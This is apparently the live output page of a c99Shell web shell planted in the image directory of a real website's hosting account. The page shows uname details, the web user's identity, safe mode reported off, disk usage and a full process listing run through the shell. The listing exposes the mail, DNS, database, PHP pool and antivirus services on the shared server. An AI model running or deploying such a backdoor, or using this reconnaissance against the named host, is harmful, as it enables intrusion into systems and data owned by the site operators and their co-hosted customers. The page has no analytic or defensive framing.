!c99Shell v. 1.0 pre-release build #16!

Software: Apache. PHP/5.6.40 

uname -a: Linux dns15359 2.6.32-48-pve #1 SMP Fri Dec 23 10:22:54 CET 2016 x86_64 

uid=10027(user_casade) gid=1003(psacln) groups=1003(psacln) 

Safe-mode: OFF (not secure)

/var/www/vhosts/casadeasturias.com/httpdocs/imagenesdb/slides/   drwxr-xr-x
Free 10.19 GB of 110 GB (9.27%)


Processes:
USER       PID %CPU %MEM     VSZ    RSS TTY   STAT START  TIME COMMAND
bind     19898  0.0  0.4  254444  20740 ?     Ssl  Jul17  0:05 /usr/sbin/named -f -t /var/named/run-root -c /etc/named.conf -u bind -n 2
dovecot  28964  0.0  0.0   10648   1732 ?     S    Jul17  0:02 dovecot/stats
dovecot  16745  0.0  0.0    9868    972 ?     S    Jul17  0:01 dovecot/anvil
dovenull 24298  0.0  0.0   21056   3716 ?     S    09:52  0:00 dovecot/imap-login
dovenull 24295  0.0  0.0   21196   3796 ?     S    09:52  0:00 dovecot/imap-login
dovenull 21636  0.0  0.0   21236   3668 ?     S    17:39  0:00 dovecot/imap-login
dovenull 24299  0.0  0.0   21196   3788 ?     S    09:52  0:03 dovecot/imap-login
dovenull 24294  0.0  0.0   21196   3736 ?     S    09:52  0:00 dovecot/imap-login
dovenull 31173  0.0  0.0   21236   3696 ?     S    Jul17  0:00 dovecot/imap-login
librer_+ 24363  0.5  0.4  443692  17928 ?     S    17:50  0:00 php-fpm: pool libreriasindependientes.com
memcache   271  0.0  0.0  337640   1020 ?     Ssl  May25  1:14 /usr/bin/memcached -m 256 -p 11211 -u memcache -l 127.0.0.1
mysql    22736  0.0  9.5 1361940 399716 ?     Ssl  Jul04 16:09 /usr/sbin/mysqld
popuser  21637  0.0  0.0   18044   2864 ?     S    17:39  0:00 dovecot/imap
popuser  12316  0.0  0.0   18236   3372 ?     S    16:29  0:00 dovecot/imap
popuser  31174  0.0  0.1   24832   4364 ?     S    Jul17  0:00 dovecot/imap
popuser  22181  0.0  0.0   18048   2872 ?     S    17:43  0:00 dovecot/imap
popuser  24297  0.0  0.0   18220   3484 ?     S    09:52  0:00 dovecot/imap
popuser  24301  0.0  0.0   18608   3908 ?     S    09:52  0:02 dovecot/imap
popuser  24296  0.0  0.1   34356   7200 ?     S    09:52  0:01 dovecot/imap
popuser  24300  0.0  0.0   22008   4000 ?     S    09:52  0:00 dovecot/imap
popuser  25149  0.2  2.1  162240  89400 ?     S    13:57  0:42 spamd child
psaadm   11447  0.0  0.7  269920  32128 ?     S    03:41  0:00 /usr/bin/sw-engine -c /opt/psa/admin/conf/php.ini /usr/local/psa/bin/extension --exec revisium-antivirus ra_executor.php
psaadm   11449  0.0  0.7  268016  29876 ?     S    03:41  0:10 /usr/bin/sw-engine -c /opt/psa/admin/conf/php.ini -dauto_prepend_file=sdk.php /opt/psa/admin/plib/modules/revisium-antivirus/scripts/ra_executor.php
psaadm   11448  0.0  0.0    4284    656 ?     S    03:41  0:00 sh -c '/opt/psa/admin/bin/php' -dauto_prepend_file=sdk.php '/opt/psa/admin/plib/modules/revisium-antivirus/scripts/ra_executor.php' 2>&1
qmaill   16367  0.0  0.0    4180    476 ?     S    Jul17  0:00 splogger qmail
qmailq   16370  0.0  0.0    4176    368 ?     S    Jul17  0:00 qmail-clean
qmailr   16369  0.0  0.0    4220    424 ?     S    Jul17  0:00 qmail-rspawn
qmails   16366  0.0  0.0    4232    508 ?     Ss   Jul17  0:01 qmail-send
root     16368  0.0  0.0    4220    392 ?     S    Jul17  0:00 qmail-lspawn | /usr/bin/deliverquota ./Maildir
root     28963  0.0  0.0   25820   2412 ?     S    Jul17  0:07 dovecot/config
root     25038  0.0  0.0   10000   1128 ?     S    Jul17  0:01 dovecot/log
root     19742  0.0  1.7  147684  72876 ?     Ss   Jul17  0:14 /usr/sbin/spamd -d --pidfile=/var/run/spamassassin.pid --create-prefs --daemonize --helper-home-dir=/var/qmail --max-children=1 --nouser-config --username=popuser --virtual-config-dir=/var/qmail/mailnames/%d/%l/.spamassassin
root     19485  0.0  0.3  413732  14892 ?     Ss   Jul17  0:06 php-fpm: master process (/etc/php5/fpm/php-fpm.conf)
root         1  0.0  0.0  180300   3416 ?     Ss   May25  4:47 init -z
root     16724  0.0  0.0   18484   1368 ?     Ss   Jul17  0:05 /usr/sbin/dovecot -F
root     15272  0.0  0.0   36444   3924 ?     S    08:54  0:02 dovecot/auth
root       273  0.0  0.0   55132   1356 ?     Ss   May25  0:18 /usr/sbin/sshd -D
root       478  0.0  0.0   12612    548 tty5  Ss+  May25  0:00 /sbin/agetty --noclear tty5 linux
root       265  0.0  0.2  438692   8672 ?     Ss   May25  1:24 php-fpm: master process (/opt/plesk/php/5.4/etc/php-fpm.conf)
root       277  0.0  0.2  339556   8912 ?     Ss   May25  1:23 php-fpm: master process (/opt/plesk/php/5.5/etc/php-fpm.conf)
root       399  0.0  0.0   65436    876 ?     S    May25  0:00 /usr/sbin/saslauthd -a pam -c -m /var/run/saslauthd -n 2
root       397  0.0  0.0   65436   1136 ?     Ss   May25  0:00 /usr/sbin/saslauthd -a pam -c -m /var/run/saslauthd -n 2
root       283  0.0  0.0   26132    800 ?     Ss   May25  0:15 /usr/sbin/cron -f
root       278  0.0  0.0  186908   2420 ?     Ssl  May25  3:53 /usr/sbin/rsyslogd -n
root       285  0.0  0.2  409620  12160 ?     Ss   May25  1:48 php-fpm: master process (/opt/plesk/php/5.6/etc/php-fpm.conf)
root       286  0.0  0.2  440704   9732 ?     Ss   May25  3:32 php-fpm: master process (/opt/plesk/php/7.0/etc/php-fpm.conf)
root       363  0.0  0.0   20164    740 ?     Ss   May25  1:24 /usr/sbin/xinetd -pidfile /run/xinetd.pid -stayalive -inetd_compat -inetd_ipv6
root       108  0.0  0.7   78416  33336 ?     Ss   May25 15:14 /lib/systemd/systemd-journald
root       479  0.0  0.0   12612    552 tty4  Ss+  May25  0:00 /sbin/agetty --noclear tty4 linux
root         2  0.0  0.0       0      0 ?     S    May25  0:00 [kthreadd/93134]
root       501  0.0  0.0   12612    548 tty6  Ss+  May25  0:00 /sbin/agetty --noclear tty6 linux
root      4812  0.0  0.4  203080  17980 ?     Ss   Jul17  0:03 /usr/sbin/apache2 -k start
root      8610  0.0  0.0   37768   1668 ?     Ss   Jul17  0:00 sw-cp-server: master process /usr/sbin/sw-cp-serverd -c /etc/sw-cp-server/config
root     11830  0.0  0.6  394148  25264 ?     Ss   Jul17  0:00 sw-engine-fpm: master process (/etc/sw-engine/sw-engine-fpm.conf)
root     11442  0.0  0.0    4024   1504 ?     Sl   03:41  0:00 plesk bin extension --exec revisium-antivirus ra_executor.php
root       482  0.0  0.0   12612    612 ?     Ss   May25  0:00 /sbin/agetty --noclear tty1 linux
root       483  0.0  0.0   12892    580 tty1  Ss+  May25  0:00 /sbin/agetty --noclear --keep-baud console 115200 38400 9600 vt102
root       481  0.0  0.0   12612    548 tty2  Ss+  May25  0:00 /sbin/agetty --noclear tty2 linux
root         3  0.0  0.0       0      0 ?     S    May25  0:00 [khelper/93134]
root       480  0.0  0.0   12612    552 tty3  Ss+  May25  0:00 /sbin/agetty --noclear tty3 linux
root        64  0.0  0.0   38860    904 ?     Ss   May25  0:00 /lib/systemd/systemd-udevd
sw-cp-s+  8611  0.0  0.0   39032   3948 ?     S    Jul17  0:00 sw-cp-server: worker process
systemd+   268  0.0  0.0   25696    620 ?     Ss   May25  0:00 /lib/systemd/systemd-resolved
user_ca+ 24406  0.0  0.0   17448   1168 ?     R    17:50  0:00 ps -aux
user_ca+ 21836  2.4  0.4  416156  16792 ?     S    17:41  0:13 php-fpm: pool casadeasturias.com
user_ca+ 23302  1.6  0.3  415644  15616 ?     R    17:47  0:03 php-fpm: pool casadeasturias.com
user_ca+ 24405  0.0  0.0    4284    648 ?     S    17:50  0:00 sh -c ps -aux
www-data 24324  0.0  0.3  203336  14104 ?     S    17:50  0:00 /usr/sbin/apache2 -k start
www-data 22774  0.0  0.3  203736  14852 ?     S    17:45  0:00 /usr/sbin/apache2 -k start
www-data 22130  0.0  0.2  203096  11864 ?     S    00:22  0:00 /usr/sbin/apache2 -k start
www-data 21735  0.0  0.3  203744  14880 ?     S    17:40  0:00 /usr/sbin/apache2 -k start
www-data 21324  0.0  0.3  204016  15288 ?     S    17:36  0:00 /usr/sbin/apache2 -k start
www-data 18052  0.0  0.3  204508  15868 ?     S    17:14  0:00 /usr/sbin/apache2 -k start
www-data 22269  0.0  0.3  203724  14928 ?     S    17:43  0:00 /usr/sbin/apache2 -k start
www-data 22590  0.0  0.3  203780  14804 ?     S    17:44  0:00 /usr/sbin/apache2 -k start
www-data 23194  0.0  0.3  203628  14636 ?     S    17:47  0:00 /usr/sbin/apache2 -k start
www-data 23139  0.0  0.3  203328  14292 ?     S    17:46  0:00 /usr/sbin/apache2 -k start
www-data 22591  0.0  0.3  203632  14740 ?     S    17:44  0:00 /usr/sbin/apache2 -k start
www-data 23201  0.0  0.3  203660  14668 ?     S    17:47  0:00 /usr/sbin/apache2 -k start


--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0086 ]--